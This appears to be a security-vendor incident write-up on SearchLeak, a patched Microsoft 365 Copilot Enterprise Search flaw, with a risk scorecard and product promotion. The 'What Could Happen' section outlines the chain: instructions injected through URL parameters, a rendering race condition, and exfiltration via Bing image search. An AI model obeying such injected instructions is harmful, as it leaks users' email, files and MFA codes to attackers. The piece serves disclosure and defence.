Copilot SearchLeak Turns Search Into a Data Drain (CVE-2026-42824)

Key Takeaways

• Varonis disclosed a patched Microsoft 365 Copilot Enterprise Search vulnerability chain called SearchLeak.
• The attack combined parameter-to-prompt injection, rendering behavior, and Bing-mediated exfiltration.
• A victim needed only to click a crafted Microsoft-hosted link for sensitive search results to be exposed.
• Microsoft patched the issue and assigned CVE-2026-42824 with critical severity.

Summary

Microsoft 365 Copilot Enterprise Search became the center of a one-click data theft scenario when Varonis disclosed SearchLeak, a patched vulnerability chain tracked as CVE-2026-42824. The issue matters because Copilot can search across high-value enterprise data sources, so a successful exploit could convert trusted productivity search into an exfiltration path.

What We Know

On June 15, 2026, Varonis publicly described SearchLeak, a vulnerability chain in Microsoft 365 Copilot Enterprise Search that could allow an attacker to retrieve user-accessible enterprise data after a victim clicked a crafted Microsoft link. The report said the attack could reach Outlook, calendar entries, OneDrive files, SharePoint content, and MFA codes that appeared in indexed data. The Hacker News report summarized the issue as a one-click theft path, while Dark Reading coverage noted that the attack was patched before disclosure. The incident sits squarely within the AI application security category tracked by the PointGuard AI Security Incident Tracker, because it shows how enterprise copilots can become data brokers when prompt, search, browser rendering, and network controls are chained together. Public reporting indicates this was a demonstrated vulnerability rather than a confirmed breach campaign.

What Could Happen

SearchLeak combined several control failures into one practical exploit path. The attacker placed instructions in URL parameters that were interpreted by Copilot as search intent, creating a parameter-to-prompt injection. Copilot then retrieved sensitive results from the user’s enterprise context. A rendering race condition allowed an attacker-controlled image request to fire before sanitization, and Bing Search by Image behavior reportedly helped route the sensitive data outward. TechRadar coverage described this as a chain involving prompt injection, HTML rendering, and SSRF-like exfiltration through Bing. The AI-specific failure was not that Copilot accessed data incorrectly by itself. The core risk was that natural-language instructions, user-scoped enterprise search, and browser-executed output could be fused into a cross-boundary data flow. Traditional security tools may trust Microsoft-hosted links, while AI systems may trust user context too broadly.

Why It Matters

This incident is important because enterprise copilots collapse search, summarization, and action into one interface. Data that is technically available to a user may still be inappropriate to expose through a crafted external interaction. That distinction matters for privacy, insider risk, and regulatory governance. In a Microsoft 365 environment, the affected data classes can include email, files, meetings, security codes, customer information, contracts, and intellectual property. Even without confirmed real-world exploitation, the demonstrated path shows that AI applications need data-loss prevention and browser-aware output controls at runtime. Organizations adopting copilots should treat indirect instructions and trusted-domain links as meaningful attack surfaces, not just usability features. This also reinforces NIST AI RMF principles around mapping AI system context, measuring risk, and managing downstream harm when models operate over sensitive business data.

PointGuard AI Perspective

SearchLeak highlights why PointGuard AI treats runtime behavior, identity context, and data movement as one security problem. The PointGuard AI Runtime Guardrails are designed to inspect prompts and responses inline, identify prompt injection patterns, and enforce policy before sensitive outputs are returned or transmitted. For agentic and copilot-style workflows, the PointGuard AI Agent Control Plane adds identity-aware validation so every agent, user, action, and data request can be evaluated before execution. The Prompt Injection vs. Indirect Prompt Injection explains why visible and hidden prompt instructions must be governed differently from normal application input. In this scenario, PointGuard AI would focus on detecting suspicious prompt construction, blocking unauthorized data retrieval patterns, and preventing model-mediated exfiltration. It also gives security teams a record of which AI system accessed which data source, under which identity, and for what purpose. That evidence is essential for investigation, compliance, and continuous improvement. As enterprises expand copilots across productivity suites, trustworthy adoption depends on runtime enforcement that travels with the AI workflow, not only perimeter filtering around it.

Incident Scorecard Details

Total AISSI Score: 7.3/10

Criticality = 8.5, Sensitive enterprise email, files, calendar data, and MFA-related information could be exposed., AISSI weighting: 25%

Propagation = 7.5, The pattern can recur across copilots that combine search, rendering, and external links., AISSI weighting: 20%

Exploitability = 5.5, A public exploit chain was demonstrated, but broad exploitation has not been confirmed., AISSI weighting: 15%

Supply Chain = 8.0, The issue depends on a hosted enterprise AI platform and connected Microsoft services., AISSI weighting: 15%

Business Impact = 6.5, High-risk exposure without confirmed customer harm or regulatory action at initial reporting., AISSI weighting: 25%

Sources

• The Hacker News: One-Click Microsoft 365 Copilot Flaw Could Have Let Attackers Steal Emails, Files, and MFA Codes
• Dark Reading: Copilot SearchLeak Attack Allows 1-Click Data Theft
• TechRadar: Microsoft 365 Copilot can be turned into a one-click data theft tool
• PointGuard AI Security Incident Tracker
• PointGuard AI Runtime Guardrails
• PointGuard AI Agent Control Plane
• Prompt Injection vs. Indirect Prompt Injection